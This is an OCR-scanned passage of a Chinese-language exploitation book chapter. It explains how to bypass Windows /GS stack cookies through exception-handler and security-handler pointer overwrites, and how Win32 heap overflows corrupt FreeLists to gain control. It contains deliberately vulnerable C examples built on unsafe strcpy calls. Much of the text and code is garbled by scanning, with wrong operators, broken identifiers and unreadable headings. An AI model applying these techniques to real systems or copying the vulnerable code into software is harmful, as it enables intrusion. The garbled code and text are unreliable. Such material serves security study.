SP 补 上 ， 其 安全 性 也 会 得 到 进一步 增强 。 如 果 上 面 描述 的 内 容 有 一 天 变 成 现实 (我 确信 会 发 生 )， 
我 们 将 不 得 不 重新 拿 起 调试 器 和 反 汇 编 器 ,发 现 新 的 可 以 利用 的 东西 。 在 此 也 有 必要 提醒 一 下 微 
软 公司 : 仅 执行 那些 已 注册 的 处 理 程序 并 确保 已 注册 的 处 理 程序 不 被 攻击 者 利用 〈 就 像 我们 上 面 
所 做 的 那样 )， 将 对 提高 系统 的 安全 性 有 很 大 的 好 处 。 


8.3.4 关于 改写 帧 处 理 程序 的 最 后 说 明 | , 

当 一 个 漏 润 在 多 个 版 本 的 操作 系统 中 出 现时 ， 如 波兰 安全 研究 小 组 发 现 的 DCOM IRemote- 
Activetion 缓冲 区 溢出 ， 提 高 破解 代码 移植 性 的 好 方法 是 攻击 异常 处 理 程序 。 这 是 因为 以 
EXCEPTION_REGTSTRATION 结 构 的 位 置 的 缓冲 区 开始 的 偏 移 可 能 会 改变 。 的 确 ， 同 样 是 DCOM 问 
题 ， 在 Windows 2003 Server 上 ， 可 在 缓冲 区 开始 后 的 1412B 处 发 现 这 个 结构 ， 在 Windows XP 上 是 
偏 移 1472B，Windows 2000 上 是 偏 移 1340B。 这 种 变化 要 求 我 们 编写 一 个 适合 所 有 操作 系统 的 破 
解 代码 。 我 们 所 要 做 的 工作 是 以 伪 处 理 程序 的 方式 嵌入 恰当 的 位 置 ， 使 它们 能 在 上 述 讨论 的 操作 
系统 上 工作 。 
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Windows 2003 Server 内 置 的 栈 保 护 机 制 是 由 微软 公司 的 Visual C++ NETH GEA. Visual 
C++ ,NET 编译 器 在 默认 情况 下 打开 /Gs 编译 器 标志 ， 告 诉 编译 器 在 生成 代码 时 使 用 放 在 栈 里 的 
Security Cookie， 以 此 保护 保存 的 返回 地 址 。 了 解 Crispim Cowan StackGuard 的 读者 都 知道 Security 
Cookie 和 canary 类 似 。canary 是 放 在 栈 里 的 4B 值 (或 是 双 字 )， 系 统 在 进程 调用 后 把 它 放 在 栈 上 ， 
并 返回 前 检查 它 ， 确 保 cookie 的 值 没 有 改变 。 这 样 一 来 ， 将 有 效 保护 保存 的 返回 地 址 和 基 指 针 
(EBP)。 这 段 描述 背后 的 逻辑 是 : 如 果 一 个 本 地 缓冲 区 被 溢出 , 那么 , 被 改写 返回 地 址 附近 的 cookie 
也 会 被 撒 带 改写 。 进 程 可 以 据 此 判断 栈 缓冲 区 被 溢出 了 , 然后 立即 采取 行动 阻止 继续 执行 代码 ( 通 
常 是 终 正 进 程 )。 乍 一 看 ， 这 是 一 个 不 可 克服 的 障碍 ， 但 在 看 过 前 几 节 关 于 滥用 帧 异常 处 理 程序 
的 内 容 后 ， 就 不 是 这 么 回 事 了 。 是 的 ， 这 些 保护 机 制 使 破解 栈 溢 出 变 得 更 加 困难 ， 但 并 不 是 不 可 
能 。 

让 我 们 继续 深入 研究 栈 保护 机 制 ， 寻 找 其 他 绕 过 它 的 方法 。 首 先 要 熟悉 cookie， 了 解 它 是 怎 
样 生 成 的 ， 它 的 随机 性 怎样 。 答 案 是 : 随机 性 很 强 ， 即 便 花 很 长 的 时 间 也 很 难 算出 其 随机 性 ， 特 
别 是 当 你 不 能 物理 访问 这 人 台 机 器 时 。 下 面 的 C 代 码 模拟 了 进程 产生 cookie 的 过 程 。 
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#include <stdio.h> 
#include «windows.h» 


int main() 

{ 
FILETIME ft; 
unsigned int Cookie=0; 
unsigned int tmp=0; 
unsigned int *ptr=0; 
LARGE_INTEGER perfcount; 


GetSystemTimeAsFileTime(&ft); 
Cookie - ft.dwHighDateTime ^ ft.dwLowDateTime; 
Cookie - Cookie ^ GetCurrentProcessId(); 
Cookie - Cookie ^ GetCurrentThreadId(); 
Cookie - Cookie ^ GetTickCount(); 
QueryPerformanceCounter(&perfcount); 
ptr - (unsigned int)&perfcount; 
tmp = *(ptr«1) ^ *ptr; 
Cookie - Cookie ^ tmp; 
printf("Cookie: %.8X\n",Cookie); 
return 0; 

} 


首先 ， 调 用 GetsystemTimeAsFileTime。 这 个 函数 的 FILETIME 结 构 有 两 个 成 员 一 一 
dwHighDpateTime 和 dwLcwDateTime， 这 两 个 值 做 xXoR 运 算 。 运 算 结果 和 进程 ID 做 xoR 运 算 ， 然 后 
依次 和 线程 DD、 系 统 启动 后 到 现在 的 毫秒 数 做 xOR 运 算 (毫秒 数 由 GetTickcount 函 数 返 回 )。 最 
后 ， 调 用 QueryPerformancecounter 获 得 一 个 指向 64 位 整数 的 指针 。 把 这 个 64 位 的 整数 分 成 两 
个 32 位 的 数 ， 这 两 个 数 做 XOR 运 算 ， 得 到 的 结果 再 和 前 面 生成 的 cookie 做 xoR 运 算 。 生 成 的 结果 
就 是 最 终 的 cookie， 它 被 保存 在 映像 文件 的 .data 区 段 里 。 

/Gs 标志 还 将 使 编译 器 重新 安排 局 部 变量 的 位 置 。 通 常 来 说 ， 局 部 变量 的 位 置 是 以 它们 在 C 
源码 中 的 顺序 出 现 的 ， 但 现在 ， 所 有 的 数组 都 被 移 至 变量 列表 的 底部 ， 放 在 最 靠近 返回 地 址 的 地 
方 。 这 样 做 的 理由 是 : 如 果 发 生 溢出 ， 其 他 的 变量 不 会 受到 影响 。 这 个 想法 有 两 个 好 处 ， 有 助 于 
防止 逻辑 混乱 ， 如 果 被 改写 的 是 指针 ， 它 将 阻止 任意 的 内 存 改写 。 

举例 说 明 第 一 个 好 处 ， 想 象 一 个 程序 需要 身份 验证 ， 执 行 验证 的 过 程 易 受 溢出 攻击 。 如 果 用 
户 的 身份 通过 验证 ， 一 个 双 字 被 设 为 1; 如 果 验 证 失败 ， 这 个 双 字 被 设 为 0。 如 果 这 个 双 字 变量 在 
缓冲 区 之 后 ， 当 缓冲 区 被 溢出 时 ， 攻 击 者 可 以 把 这 个 变量 设 为 1， 使 他 们 的 身份 看 起 来 已 经 被 认 
证 了 ， 尽 管 他 们 并 没有 提交 有 效 的 用 户 岂 或 密码 。 

当 使 用 栈 Security Cookie 时 ， 系 统 在 过 程 返回 后 会 检查 栈 里 的 cookie， 确 认 它 是 否 与 过 程 开 
始 时 的 值 一 样 。 这 个 cookie 的 一 个 授权 副本 保存 在 当前 过 程 的 映像 文件 的 .aata 区 段 里 。 栈 里 的 
cookie 被 复制 到 Ecx 寄 存 器 ， 然 后 和 .aata 区 段 里 的 副本 比较 。 这 是 问题 编号 一 ， 我 们 将 马上 解释 
为 什么 以 及 在 什么 情况 下 会 出 现 这 种 情况 。 

如 果 cookie 不 匹配 ， 执 行 检查 的 代码 将 调用 安全 处 理 程 序 。 如 果 安 全 处 理 程序 已 经 定义 ， 那 
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么 指向 处 理 程 序 的 指针 将 保存 在 易 受 攻击 过 程 的 映像 文件 的 .aata 区 段 里 。 如 果 这 个 指针 不 是 
NULL， 它 将 被 移 到 Eax 寄 存 器 ， 然 后 调用 EAX。 这 是 问题 编号 二 。 如 果 安 全 处 理 程序 没有 定义 ， 
那么 把 指向 unhandledExceptionFilter 的 指针 设 为 0x00000000， 然 后 调用 UnhandledExcep- 
tionFilter 函 数 。UnhandleqExceptionFiLtezr 函 数 不 仅仅 终止 进程 ， 它 执行 所 有 的 动作 并 调 
用 函数 的 各 种 功能 。 

推荐 你 用 IDA Pro#f@UnhandledExceptionFilterM MAEM EA. KNOT: 
这 个 函数 先 加 载 faultrep.d11 库 ， 然 后 执行 faultrep .dl11 库 里 导出 HReportFault WAX. 
这 个 函数 做 各 种 处 理 并 负责 弹出 Tell-Microsoft-about-this-bug 窗 口 。 看 过 PCHHangRepExecPipe 
和 PCHFaultRepExecPipe 命 名 管道 吗 ? 它们 都 在 ReportFault 中 被 使 用 。 

现在 回 到 我 们 关注 的 问题 上 来 , 并 检查 它们 为 什么 会 成 为 实际 的 问题 。 做 这 个 的 最 好 方法 是 
查看 相关 的 代码 。 考 虑 下 面 这 段 设 计 非常 巧妙 的 C 源 码 。 


#include <stdio.h> 
#include «windows.h» 


HANDLE hp=NULL; 
int ReturnHostFromUrl(char **, char *); 


int main() 
t 
char *ptr - NULL; 
hp - HeapCreate(0,0x1000,0x10000); 


ReturnHostFromUrl (&ptr,"http://www.ngssoftware.com/index.html"); 
printf("Host is $s",ptr); 
HeapFree(hp,0,ptr); 
return 0; 


} 


int ReturnHostFromUrl (char **buf, char *url) 
{ 

int count = 0; 

char *p = NULL; 

char buffer[40]=""; 


// Get a pointer to the start of the host 
p = strstr(url,"http://"); 


itf(!p) 
return 0; 
pept+t 了; 
// do processing on a local copy 
strepy(buffer,p); // «------ NOTE 1 


// find tbe first slash 
while(buffer[count] !='/') 
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count ++; 
// set it to NULL 
buffer([count] = 0; 
// We now have in buffer the host name 
// Make a copy of this on the heap 
p = (char *)HeapAlloc(hp,0,strlen(buffer)+1); 
if(!p) 
return 0; 
strcpy (p, buffer); 
*buf = p; // <------------~- NOTE 2 
return 0; 


} 
这 个 程序 获取 URL 并 从 中 提取 主机 名 。 把 ReturnHostFzromUr1 函 数 中 可 能 发 生 栈 缓冲 区 溢 
出 的 地 方 标 为 NorE 1。 先 把 它 放 一 放 ， 如 果 查 看 这 个 函数 的 原型 ， 会 看 到 它 有 两 个 参数 一 一 一 
个 是 指向 指针 的 指针 (char **)， 田 一 个 是 指向 需要 破解 的 URL 的 指针 。 我 们 把 第 一 个 参数 
(char **) 设 为 指向 保存 在 动态 堆 里 的 主机 名 的 指针 一 一 NOTE 2。 请 看 下 面 的 汇编 代码 。 


004011BC mov ecx,dword ptr [ebp+8] 
004011BF mov edx,dword ptr [ebp-8] 
004011C2 mov dword ptr [ecx],edx 


在 0x004011BC 处 ， 作 为 第 一 个 参数 传递 的 指针 的 地 址 被 移 到 了 ECX。 接 下 来 ， 在 堆 上 指向 
主机 名 的 指针 被 移 到 EDx， 然 后 移 到 Ecx 指 向 的 地 址 。 这 里 就 是 我 们 提 到 的 问题 悄悄 混 进来 的 地 
方 。 如 果 溢 出 栈 缓冲 区 ， 将 会 改写 cookie， 改 写 保 存 的 基 指 针 ， 改 写 保 存 的 返回 地 址 ， 然 后 改写 
传递 给 函数 的 参数 。 图 8-3 真 实地 反映 了 这 种 状况 。 





保存 的 EBP 


























溢出 前 溢出 后 
图 8-3 ”缓冲 区 溢出 前 /后 的 快照 
绥 冲 区 溢出 之 后 , 攻击 者 掌控 的 参数 被 传递 给 函数 。 这样 , 当 0x004011BC 处 的 指令 执行 *buf 
= p 操作 时 ， 我 们 就 可 能 改写 任意 内 存 ， 也 有 机 会 引起 访问 违例 。 看 这 两 种 可 能 中 的 后 一 种 ， 如 
果 我 们 用 0x41414141 改 写 EBP+8 处 的 参数 ， 进 程 将 试 着 向 这 个 地 址 写 入 一 个 指针 。 因 为 
0x41414141 属 于 已 初始 化 的 内 存 〈 不 是 正常 的 )， 所 以 写 操作 将 引起 访问 违例 ， 从 而 允许 我 们 洲 
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用 结构 化 异常 处 理 机 制 绕 过 之 前 讨论 过 的 栈 保护 。 但是， 要 是 我 们 不 想 引 起 访问 违例 呢 ? 因为 当 
前 正在 研究 其 他 绕 过 栈 保护 的 技巧 ， 所 以 ， 看 “改写 任意 内 存 ” 是 否 会 有 惊喜 。 

回 到 描述 检查 cookie 进 程 中 提 到 的 问题 。 当 授权 版 本 的 cookie 保 存在 映像 文件 的 .data 区 段 里 
时 ， 第 一 个 问题 出 现 了 。 可 以 在 特定 版 本 映像 文件 的 固定 位 置 找到 这 个 cookie《 不 同 的 版 本 也 可 
能 是 这 样 )。 如 果 p 位 置 是 一 个 指向 堆 上 的 主机 名 的 指针 ， 并 且 是 可 以 预先 知道 的 ， 就 是 说 ， 每 次 
运行 程序 时 ， 这 个 地 址 是 一 样 的 ， 那 我 们 就 能 用 这 个 地 址 改写 .aata 区 段 里 的 授权 版 本 的 cookie， 
并 用 同样 的 值 改写 保存 在 栈 上 的 cookie。 用 这 个 方法 处 理 后 ， 当 进程 检查 cookie 时 ， 它 们 是 一 样 
的 。 所 以 ， 我 们 就 可 以 绕 过 cookie 检 查 ， 控 制 执行 路 径 ， 并 像 正常 的 栈 缓冲 区 溢出 那样 返回 选择 
的 地 址 。 

然而 ， 在 这 种 情况 下， 这 并 不 是 最 好 的 选择 。 为 什么 不 是 呢 ?” 咽 ,我 们 得 到 用 可 控制 内 容 的 
缓冲 区 的 地 址 改写 一 些 东西 的 机 会 ， 可 以 用 破解 代码 填充 缓冲 区 ， 并 用 缓冲 区 的 地 址 改写 函数 指 
针 。 这 样 ， 当 函数 被 调用 时 ， 执 行 的 是 我 们 的 代码 。 但 这 样 一 来 ， 我 们 将 不 会 通过 cookie 检 查 ， 
这 就 涉及 第 二 个 问题 。 回 想 一 下 ， 如 果 安 全 处 理 程序 已 经 定义 了 ， 倘 若 cookie 检 查 失 败 将 会 调用 
它 。 在 这 种 情况 下 ， 这 样 的 结果 最 好 不 过 了 。 安 全 处 理 程序 的 函数 指针 保存 在 .data 区 段 里 ， 
些 , 我 们 可 以 知道 它 在 哪 ,， 并 可 以 用 指向 缓冲 区 的 指针 改写 它 。 所 以 ， 当 cookie 检 查 失 败 时 ,“ 安 
全 处 理 程序 ”被 执行 ， 我 们 获得 控制 权 。 

下 面 说 明 另 外 一 种 方法 。 回 想 一 下 ， 如 果 不 能 通过 cookie 检 查 且 安全 处 理 程序 又 没有 定义 ， 
那么 ， 系 统 在 把 实际 的 处 理 程 序 设 为 0 后 ， 将 调用 UnhanqdleqExceptionFilter。 因 此 ， 函 数 里 
的 许多 代码 会 被 执行 ,我们 可 以 为 所 和 欲 为 了 。 例如， 从 UnhandledExceptionFilter 函 数 内 部 调 
用 GetSystemDirectoyWw， 然 后 从 返回 的 路 径 加 载 faultrep.d1ll1。 在 Unicode 涪 出 的 情形 里 ， 我 
们 可 以 改写 指向 系统 目录 的 指针 ， 这 个 指针 和 一 个 指向 我 们 自己 的 “系统 ”目录 的 指针 存储 在 
kernel32 .Gd11 的 .data 区 段 里 。 因 此 可 以 加载 自己 的 faultrep .dl1 来 代替 真正 的 taultrep. 
dl1。faultrep.dl1 只 输出 ReportFault 函 数 ， 而 这 个 函数 将 被 调用 。 

另外 ， 还 有 一 种 有 趣 的 可 能 〈 这 里 的 介绍 只 停留 在 理论 阶段 ) ERE KH. A8 ME 
UnhandledExceptionFilter 这 样 的 函数 调用 并 没有 采用 cookie 保 护 。 现 在 ,假设 其 中 的 
GetSystemDirectorywwHRAZA KRHA: 系统 目录 从 没有 超过 260B 的 ， 且 来 源 可 
信 ， 因 此 不 必 担 心 这 里 会 发 生 溢 出 。 把 数据 复制 到 这 个 固定 长 度 的 缓冲 区 ， 直 到 遇 到 空 终 止 符 为 
止 。 明 白 我 的 意思 吧 。 现 在 ， 在 正常 情况 下 这 是 不 会 触发 溢出 的 ， 但 是 如 果 用 指向 缓冲 区 的 指针 
改写 指向 系统 目录 的 指针 ， 那 么 将 有 可 能 引起 没有 采用 cookie 保 护 的 代码 的 二 次 溢出 。 这 样 做 了 
以 后 ， 可 以 返回 选择 的 地 址 ， 从 而 获得 控制 权 。 当 这 些 发 生 时 ，GetsystemDirectory 不 易 受到 
攻击 。 但 漏洞 潜伏 在 unhandledExceptionFilter 代 码 里 的 某 个 地 方 ， 只 是 还 没 发 现 它 。 你 可 以 
自己 尝试 一 下 。 

你 也 许 会 问 这 种 情形 〈 也 就 是 说 ， 在 调用 cookie 检 查 代码 之 前 ， 有 一 块 内 存 可 被 任意 改写 ) 
是 否 可 能 存在 。 答 案 是 肯定 的 ， 这 种 情形 经 常会 出 现 。 实 际 上 ， 波 兰 的 安全 研究 小 组 就 是 在 遇 到 
这 个 问题 后 才 发 现 DcoM 漏 洞 的 。 这 个 易 受 攻击 的 函数 有 一 个 参数 是 wchar ** 类 型 。 这 恰好 发 生 
在 函数 返回 到 被 设置 的 指针 之 前 ， 允 许 任意 内 存 可 被 改写 的 时 候 。 利 用 这 类 漏洞 的 唯一 技术 难点 
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是 触发 溢出 ， 输 入 只 能 是 以 两 个 反 斜 杠 开始 的 Unicode UNC 路 径 。 假 如 用 指向 我 们 缓冲 区 的 指针 
改写 指向 安全 处 理 程序 的 指针 ， 当 安全 处 理 程 序 被 调用 时 ， 首 先 执行 的 可 能 是 : 


pop esp 
add byte ptr[feax+eax+n] ,bl 


其 中 n 是 下 一 字 节 。 因 为 EAX 十 EAX 十 n 不 可 写 ， 所 以 我 们 将 引起 访问 违例 并 失去 对 进程 的 控制 。 
为 在 缓冲 区 的 开头 我 们 被 两 个 反 斜 杠 纠缠 住 了 ， 所 以 ， 上 述 的 破解 方法 行 不 通 。 假 如 没有 这 两 个 
反 斜 杜 ， 这 个 方法 是 可 行 的 。 

最 后 ， 我 们 看 到 有 多 种 方法 可 以 绕 过 Security Cookies 和 .NET cs 选项 提供 的 栈 保 护 机 制 。 上 
文 已 经 介绍 过 怎样 滥用 结构 化 异常 处 理 了 , 也 介绍 压 入 栈 的 自 有 参数 怎样 传递 给 易 受 攻击 的 函数 
并 被 使 用 。 随 着 时 间 的 推移 ， 微 软 公司 肯定 会 改进 这 些 保护 机 制 ， 从 而 使 破解 栈 缓冲 区 溢出 更 加 
困难 。 当 然 ， 这 个 漏洞 是 否 会 被 终结 ， 我 们 拭目以待 。 
8.5 Hih X iih 

RIK PREA EA WT Re BH, RST OR MR. EARE RATZ R, 
先 了 解 堆 是 什么 。 简 单 地 说 , 堆 是 保存 动态 数据 的 内 存 区 域 。 例如 , 假设 有 一 个 Web 服 务 器 程序 。 
服务 器 程序 被 编译 成 二 进 制 文件 之 前 ， 并 不 知道 客户 端 会 提交 何 种 请 求 。 这 些 请 求 可 能 是 20B， 
也 可 能 是 20 000B。 要 求 服务 程序 能 妥善 处 理 这 两 种 情况 。 那 么 ， 与 其 用 固定 大 小 的 栈 缓冲 区 来 
处 理 请 求 ， 还 不 如 用 堆 。 这 样 一 来 ， 在 堆 上 根据 请 求 的 大 小 动态 分 配 一 定 的 空间 ， 把 这 些 空间 作 
为 处 理 请 求 的 缓冲 区 。 利 用 堆 帮 助 内 存 管 理 ， 将 有 助 于 提高 程序 段 的 扩展 性 。 


8.6 ”进程 堆 


Win32 中 每 个 进程 都 有 一 个 默认 堆 , 38 55 t n GERE . WIL CER Get ProcessHeap () 将 返 
回 指 向 进程 堆 的 句柄 。 进 程 堆 的 指针 也 保存 在 PEB 里 。 下 列 汇编 代码 将 把 指向 进程 堆 的 指针 放 入 
EAX 寄存 器 : 


mov eax, dword ptr fs: [0x30] 
mov eax, dword ptr[eax+0x18] 


许多 需要 利用 堆 进 行 处 理 的 Windows API 基 础 函数 都 使 用 默认 的 进程 堆 。 


8.6.1 动态 堆 
在 Win32 下 ， 作 为 默认 进程 堆 ， 进 程 可 以 更 进一步 创建 合适 数量 的 动态 堆 。 进 程 用 
HeapCreate () 函数 创建 动态 堆 ， 这 些 堆 是 全 局 可 用 的 。 


8.6.2 与 堆 共 和 舞 

进程 把 数据 保存 到 堆 之 前 ， 需 要 先 在 堆 上 为 这 些 数据 分 配 空间 。 这 意味 着 这 个 进程 想 在 堆 上 
划 出 一 块 空间 来 存储 数据 。 程 序 用 HeapAllocate() 函数 来 做 这 些 ， 传 递 诸如 程序 需要 多 少 堆 空 
间 的 信息 。 如 果 一 切 正常 ， 堆 管理 器 将 从 堆 上 分 配 一 块 内 存 ， 并 把 这 块 内 存 的 指针 传 给 它 的 调用 
者 ， 之 后 ， 进 程 就 可 以 正常 使 用 堆 了 。 不 用 说 ， 堆 管理 器 需要 记录 哪些 内 存 块 已 被 分 配 了 ; CH 
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堆 管理 结构 完成 这 个 任务 。 这 个 结构 基本 上 包含 了 如 下 信息 : 已 分 配 块 的 大 小 和 两 个 指针 (两 个 
指针 指向 另外 一 个 指向 下 一 个 可 用 块 的 指针 )。 

顺便 说 一 句 ， 我 们 刚才 提 到 程序 用 Heapallocate() 函数 请 求 一 块 堆 。 其 实 ， 也 可 以 使 用 其 
他 的 堆 函 数 ， 而 且 有 些 还 提供 了 更 好 的 向 后 兼容 性 。Win16 有 两 个 堆 : 一 个 是 每 个 进程 都 可 访问 
的 全 局 堆 ， 另 一 个 是 每 个 进程 自己 的 局 部 堆 。Win32 仍 然 有 这 样 的 函数 ， 如 Localalloc() 和 
GlobalRAlloc()。 然 而 ，Win32 没 有 Win16 上 的 那些 区 别 , 在 Win32 上 ， 这 些 函 数 都 是 从 进程 的 默 
认 堆 上 分 配 空间 的 。 这 些 函数 在 本 质 上 和 HeapaLlocate () 是 类 似 的 : 

h = HeapAllocate(GetProcessHeap(),0,size); 

一 旦 进程 保存 在 堆 上 的 数据 完成 其 使 命 , 系统 将 释放 这 块 堆 空间 , 并 为 再 次 使 用 它 做 好 准备 。 
释放 堆 空 间 和 释放 分 配 的 内 存 一 样 容 易 ，HeapFree、Local free 或 GlobalFree 函 数 都 可 以 从 默 
认 进 程 堆 里 释放 堆 。 

有 关 堆 的 更 多 细节 ， 请 阅读 MSDN 文 档 : http://msdn.microsoft.com/library/default.asp?url=/ 
library/en-us/memory/base/memory management reference.asp. 


8.6.3 ” 堆 是 如 何 工作 的 


记 住 ， 栈 地 址 向 ox00000000 方 向 增长 ， 而 堆 相 反 。 这 意味 着 两 次 调用 Heapallocate 后 ， 第 
一 抉 堆 的 虚 地 址 比 第 二 块 小 。 因 此 ， 第 一 块 堆 的 任何 溢出 都 有 可 能 溢出 到 第 二 块 堆 中 。 
不 论 是 默认 进程 堆 还 是 动态 堆 ， 它 们 的 开头 都 有 一 个 结构 ， 这 个 结构 包含 了 一 些 数据 ， 其 中 
的 128 位 LIST_ENTRY 数 组 结构 记录 堆 的 空闲 块 , 我 们 把 它 称 为 FreeLists。 每 个 LIST_ENTRY 有 两 
个 指针 〈winnt .h 里 有 相关 描述 )。 在 堆 结构 偏 移 0x178 字 节 处 ， 可 以 发 现 这 个 数组 的 开头 。 当 第 
一 次 创建 堆 时 ， 指 向 分 配 的 第 一 块 可 用 内 存 的 两 个 指针 保存 在 FreeLists[0] 里 。 在 这 些 指针 指 
向 的 地 址 (第 一 个 可 用 块 的 开始 ) 是 两 个 指向 FreeLists[0] 的 指针 。 于 是 ， 假 设 我 们 创建 一 个 
基地 址 为 0x00350000 的 堆 ， 第 一 个 可 用 块 的 地 址 为 0x00350688， 那 么 : 
O 在 地 址 0x00350178 (FreeList[0].Flink) 处 是 一 个 指针 ， 其 值 为 0x00350688《〈 第 一 
NAR); 
O 在 地 址 0x0035017C (FreeList[0].Blink) 处 是 一 个 指针 ， 其 值 为 0x00350688 (第 一 
个 空闲 块 ); . 
O 在 地 址 0x00350688( 第 一 个 空闲 块 ) 处 是 一 个 指针 , 其 值 是 0x00350178 (FreeList [0] ); 
O Æ Hh bE ox0035068c (第 一 个 空闲 块 十 4) 处 是 一 个 指针 ， 其 值 是 0x00350178 
(FreeList[0]). 
如 果 分 配 新 空间 (例如 ， 调 用 RtlAllocateHeap 请 求 260B 的 内 存 )，FreeList[0] .Flink 
和 FreeList[0] .Blink 指 针 将 被 更 新 ， 指 向 下 一 个 可 分 配 的 空闲 块 。 同 时 ， 问 指 FreeList 数 组 
的 两 个 指针 被 移 到 新 分 配 块 的 尾部 。 随 着 堆 的 每 一 次 分 配 或 释放 ， 这 些 指针 都 会 被 更 新 ， 已 分 配 
的 块 以 这 种 形式 记录 在 双向 链表 里 。 当 推 缓冲 区 溢出 至 堆 控制 数据 时 ， 这 些 指 针 的 更 新 将 允许 改 
写 任意 的 双 字 , 攻击 者 有 机 会 修改 诸如 函数 指针 之 类 的 程序 控制 数据 ， 从 而 得 到 进程 执行 的 控制 
权 。 攻 击 者 将 改写 那些 最 有 可 能 使 他 获得 程序 控制 权 的 程序 控制 数据 。 例 如 ， 如 果 攻 击 者 用 他 的 
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缓冲 区 的 指针 改写 函数 指针 ， 但 在 这 些 函 数 指针 被 访问 前 发 生 访 问 违 例 ， 攻 击 者 很 可 能 会 丧失 控 
制 权 。 在 这 种 情况 下 ， 攻 击 者 改写 异常 处 理 程序 的 指针 会 更 好 一 些 ， 因 为 在 发 生 访问 违例 时 ， 将 
会 执行 攻击 者 的 代码 。 

在 破解 堆 溢 出 并 利用 它 运行 任意 代码 之 前 ， 先 深入 研究 一 下 这 个 问题 。 

下 面 的 例子 易 受 堆 溢 出 攻击 : 


#include <stdio.h> 
#include <windows.h> 


DWORD MyExceptionHandler (void); 
int foo(char *buf); 


int main(int argc, char *argv[l) 
{ 
HMODULE 1; 
1 = LoadLibrary ("msvert.d1ll"); 
1 LoadLibrary ("netapi32.dll1"); 
printf ("\n\nHeapoverflow program. Mn"); 


外 


if(argc !- 2) 

return printf("ARGS!"); 
foo(argv[11); 
return 0; 


DWORD MyExceptionHandler (void) 

t 
printf("In exception handler...."); 
ExitProcess(1); 
return 0; 


int foo(char *buf) 


{ 
HLOCAL h1 = 0, h2 = 0; 
HANDLE hp; 


— tryí 
hp - HeapCreate(0,0x1000,0x10000); 
if(!hp) 
return printf("Failed to create heap. Wn"); 
hl = HeapAlloc (hp, HEAP_ZERO_MEMORY, 260); 


printf("HEAP: $.8X %.8X\n",h1,&h1); 


// Heap Overflow occurs here: 
strcpy(hl,buf); 


// This second call to HeapAlloc() is when we gain control 
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h2 = HeapAlloc(hp,HEAP ZERO MEMORY,260); 
printf("hello"); 

} 

_ except (MyExceptionHandler () ) 

{ 
printf ("oops..."); 

} 

return 0; 


} 











注解 为 得 到 最 佳 效果 ， 请 用 微软 公司 的 Visual C++ 6.0 编 译 这 个 程序 ， 在 命令 行 中 输入 cl /TC 


heap.c. 





代码 里 包含 的 漏洞 是 foo () 函数 的 strcpy O 调用 。 如 果 buf 字 符 串 超 过 260B《〈 目 的 缓冲 区 的 
大 小 )， 就 会 改写 堆 控制 结构 。 控 制 结构 里 有 两 个 指向 FreeLists 数 组 的 指针 ， 在 数组 里 能 找到 
一 对 指向 下 一 个 空闲 块 的 指针 。 当 释放 或 分 配 时 ， 堆 管理 程序 将 更 新 这 些 指针 : 把 第 一 个 指针 移 
到 第 二 个 指针 中 ， 把 第 二 个 指针 移 到 第 一 个 指针 中 。 

传递 超 长 的 参数 〈 例 如 ，300B) 给 这 个 程序 (将 传递 给 foo 函 数 ， 然 后 发 生 游 出 )， 在 第 二 
次 调用 Heapalloc () 之 后 ， 下 面 的 指令 引起 访问 违例 ， 


77F6256F 89 01 mov dword ptr [ecx],eax 
77F62571 89 48 04 mov dword ptr [eax+4],ecx 


尽管 在 第 二 次 调用 HeapAlloc 时 触发 了 访问 违例 ， 但 调用 HeapFree 或 HeapRealloc 同 样 也 
会 触发 访问 违例 。 如 果 查 看 ECX 和 EAX， 就 会 发 现 它们 之 中 包含 了 传递 给 程序 的 参数 。 我 们 改写 
了 堆 控 制 结构 里 的 指针 ， 因 此 ， 第 二 次 调用 HeapAlloc () 后 ,会 更 新 堆 控制 结构 ， 至 此 ， 我 们 完 
全 控制 了 这 两 个 寄存 器 。 观 察 下 面 这 条 指令 做 了 些 什么 。 

mov dword ptr [ecx],eax 

这 意味 着 把 EAX 里 的 数据 移 到 Ecx 指 向 的 地 址 。 同 样 ， 可 以 用 32 位 数据 改写 进程 《标记 为 可 
写 ) 虚拟 地 址 空间 里 的 32 位 数据 。 可 以 通过 改写 程序 控制 数据 来 破解 它 。 然 而 ， 要 注意 了 。 看 下 
面 这 行 代码 。 

mov dword ptr [eax-4],ecx 

当 这 条 指令 执行 后 ，EAX〔 第 一 行 里 用 于 改写 Ecx 指 向 的 地 址 〉 的 值 也 必须 指向 可 写 的 内 存 ， 
因为 不 管 Ecx 里 是 什么 , 现在 都 要 写 入 EAX+4 指 向 的 地 址 。 如 果 EAX 没 有 指向 可 写 的 内 存 ， 将 发 生 
访问 违例 。 实 际 上 这 并 不 是 什么 坏事 ， 它 可 能 对 众多 破解 堆 溢 出 的 方法 中 的 某 些 方法 有 所 帮助 。 
攻击 者 经 常用 指向 一 块 代码 的 指针 改写 栈 上 的 异常 注册 结构 的 处 理 程序 的 指针 或 未 经 处 理 的 异 
常 过 滤器 ， 如 果 发 生 异 常 ， 他 们 将 返回 到 自己 的 代码 。 你 瞧 ， 如 果 ERx 指 向 不 可 写 的 内 存 ， 就 会 
发 生 蜡 常 ， 从 而 热 行 我 们 的 代码 。 即 使 Eax 指 向 可 写 的 内 存 ， 但 因为 RaAX 和 ECX 不 相等 ， 底 层 的 堆 
函数 很 可 能 会 因为 接受 了 一 些 错误 路 径 而 发 生 异 常 。 因 此 ， 破 解 堆 溢 出 时 ， 改 写 异 常 处 理 程序 的 
指针 可 能 是 最 便捷 的 方法 。 
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8.7 ”破解 堆 溢 出 


关于 程序 员 ， 有 许多 令 人 费解 的 事情 ， 比 如 说 ， 他 们 知道 栈 缓冲 区 溢出 很 危险 ， 却 认为 堆 组 
冲 区 洲 出 没什么 大 不 了 ; 他 们 会 想 ， 怎 么 会 溢出 呢 ? 最 坏 的 情况 也 只 是 程序 崩溃 里 了 。 这 些 程 序 
员 没 有 认识 到 堆 溢出 和 栈 溢 出 同样 危险 , 他 们 仍 快乐 地 使 用 着 那些 有 害 的 函数 ， 比 如 说 在 堆 缓 冲 
区 上 使 用 strcpy() 和 strcat O 函数 。 我 们 在 前 面 讨 论 过 ， 使 用 异常 处 理 程序 是 破解 堆 溢 出 、 运 
行 代码 的 最 好 方法 。 在 推 溢出 时 ， 利 用 帧 异常 处 理 改写 指向 异常 处 理 程 序 的 指针 是 众所周知 的 方 
法 ; 因而 ， 也 可 用 于 未 经 处 理 的 异常 过 滤器 。 这 里 先 不 深入 讨论 这 些 (本 节 结 尾 再 介绍 )， 而 是 
学 习 两 个 新 技术 。 
8.7.1 改写 PEB 里 指向 RtlEnterCriticalSection 的 指针 


